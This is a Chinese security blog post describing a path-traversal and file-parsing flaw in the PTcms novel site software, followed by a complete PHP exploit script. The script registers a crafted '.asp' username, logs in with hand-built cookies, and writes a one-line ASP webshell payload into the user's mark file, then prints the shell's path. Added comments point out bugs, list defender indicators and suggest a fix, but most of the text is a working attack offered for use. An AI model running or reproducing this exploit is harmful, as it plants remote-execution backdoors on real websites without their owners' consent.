于没有带到数据库检测 而是直接验证程序内有没有这个文件名的文件夹,

那么我们注册../../1.asp; 或者../../2.asp

然后在书架或者收藏那里插入一句话,

对应的木马地址是

 

https://www.webshell.cc/1.asp/mark.ptv

ps: 依赖解析漏洞的,鸡肋。

下面放出落叶的exp 怕在下面大家看不到哈。

<?php
//error_reporting(0);
// Banner; printed before any argument handling.
print_r('
+---------------------------------------------------------------------------+
PTcms Code written Exploit
by:cfking@90sec.org
welcome to [url]www.90sec.org[/url]
+---------------------------------------------------------------------------+
'
);

// Usage check: a missing first argument prints usage and stops.
// (`==null` is a loose comparison, so an empty-string argument trips it too.)
if($argv[1]==null){
print_r('
Usage: php '.$argv[0].' url
Example:
php '.$argv[0].' [url]www.site.com[/url]
');
;exit;
}
$url=$argv[1];
// Username submitted to the registration form: 10 hex chars of md5(time())
// plus an ".asp" suffix. postzend() reads it via `global $user` to build the
// path it reports on success. md5(time()) repeats for runs in the same second.
$user=substr(md5(time()),0,10).".asp";
// Today's date; reused as the hand-built `logtime` cookie value below.
$settime=date("Y-m-d",time());
// Request 1: registration (default $type='reg', default path /user/reg.php?step=3).
// postzend() returns $user when the page carries its success marker, false otherwise.
$to=postzend($url,"username=$user&password=hacker&chk_password=hacker&dosubmit=%CF%C2%D2%BB%B2%BD");
// NOTE: postzend() returns false on failure, never null, so `!==null` is always
// true and the two follow-up requests are sent even when registration failed.
if($to!==null){
// Request 2: login as the registered user ('login' selects the "登录成功" marker in postzend()).
postzend($url,"comeurl=http%3A%2F%2Fwww.cscity.net%2Fuser%2Findex.php&username=$to&password=hacker&cookietime=31536000&dosubmit=%CC%E1+%BD%BB",'login','/user/logchk.php');
// Session state is assembled by hand rather than taken from the login response:
// fixed logip/pt_userlv/pt_userpmnum values plus the registered username.
$cookie="logtime=$settime; logip=110.110.110.110; pt_userlv=%B7%B2%C8%CB; pt_userpmnum=0; pt_username=$to";
// Request 3: POST to /user/mark.php with type 'exploit' (postzend() sets no marker
// for that type, so its result branch is cosmetic). Form field `1` is the content
// the application stores for the user's mark; per postzend()'s success message that
// lands in data/user/<username>/mark.ptv. From a defender's side the two things to
// look for are usernames containing ".asp" or "../" and mark.ptv files containing
// this request body; the fix is server-side validation of the username and not
// deriving filesystem paths from it (the write-up above says it is only checked
// against existing folders, not the database -- TODO confirm against the code).
postzend($url,'1=%3C%25execute+request%28chr%2835%29%29%25%3E&dochange=%D0%DE+%B8%C4','exploit','/user/mark.php',$cookie);
}
/**
 * Sends one hand-built HTTP/1.1 POST to $url on port 80 via fsockopen() and
 * reports whether the response's first "<p>...<br/>" fragment starts with the
 * status marker for $type.
 *
 * @param string $url     host name; used for the socket and for the Host/Referer headers (port fixed at 80, plain TCP)
 * @param string $content URL-encoded form body
 * @param string $type    'reg' selects the "注册成功" marker, 'login' the "登录成功" marker; any other value sets no marker
 * @param string $path    request path
 * @param string $cookie  Cookie header value (default is a fixed ASPSESSIONID)
 * @return string|false   the global $user when the marker matches, false otherwise; die()s when the socket cannot be opened
 */
function postzend($url,$content,$type='reg',$path='/user/reg.php?step=3',$cookie='ASPSESSIONIDASDRRBRA=MFILAMMAENMDGAPJLLKPEAON'){
global $user; // only used for the return value and the success-message path
$host=$url;
$port="80";
// Request assembled by hand. Content-Length is computed on $content alone even
// though "\r\n" is appended after the body; Connection is keep-alive although the
// read loop below relies on the server closing the connection.
$data = "POST $path HTTP/1.1\r\n";
$data .= "Host: ".$host."\r\n";
$data .= "User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.2; zh-CN; rv:1.9.0.2) Gecko/2008091620 Firefox/3.0.2\r\n";
$data .= "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n";
$data .= "Accept-Language: zh-cn,zh;q=0.5\r\n";
$data .= "Accept-Charset: gb2312,utf-8;q=0.7,*;q=0.7\r\n";
$data .= "Referer: http://$host/user/reg.php?step=2\r\n";
$data .= "Cookie: $cookie\r\n";
$data .= "Connection: keep-alive\r\n";
$data .= "Content-Type: application/x-www-form-urlencoded\r\n";
$data .= "Content-Length: ".strlen($content)."\r\n\r\n";
$data .= $content."\r\n";
$ock=fsockopen($host,$port);
if (!$ock) {
echo "[-] No response from $host \n";
die;
}
fwrite($ock,$data);
// Read the whole response (headers + body) until EOF. $exp is never initialised,
// so the first .= raises a notice unless error_reporting is lowered.
while (!feof($ock)) {
$exp .=fgets($ock, 1024);
}
// Marker and message per request type. For any other $type (the 'exploit' call
// from the top-level script) $tag and $msg stay undefined, so the comparison
// below is against an empty string.
if($type=='reg'){
$tag="注册成功";$msg="Reg Successful\n[-] shellpath [-] \nhttp://$host/data/user/$user/mark.ptv";
}
if($type=='login'){$tag="登录成功";$msg="Login Successful";}
// First "<p>...<br/>" fragment; the page is assumed to put "<status>,<detail>"
// there -- TODO confirm against the application's templates. $arr[1] is unset
// (notice) when nothing matches.
preg_match("/<p>(.*?)<br\/>/", $exp, $arr);
$result=explode(",",$arr[1]);
if($result[0]=="$tag"){
echo "[*] $msg \n";
return $user;
}else{
// Same regex as above. preg_match() always leaves $arrs an array (empty when
// nothing matched), so is_array() is always true and "Exploit Successful" is
// printed for every non-marker response, including genuine failures. The
// trailing exit is unreachable after return.
preg_match("/<p>(.*?)<br\/>/", $exp, $arrs);
if(is_array($arrs)){
echo "[*] Exploit Successful\n";
echo "[*] The pass # \n";
}else{
echo "[-] Exploit Failed\n";
}
return false;
exit;
}

}
?>

转载请注明来自WebShell'S Blog,本文地址:https://www.webshell.cc/3108.html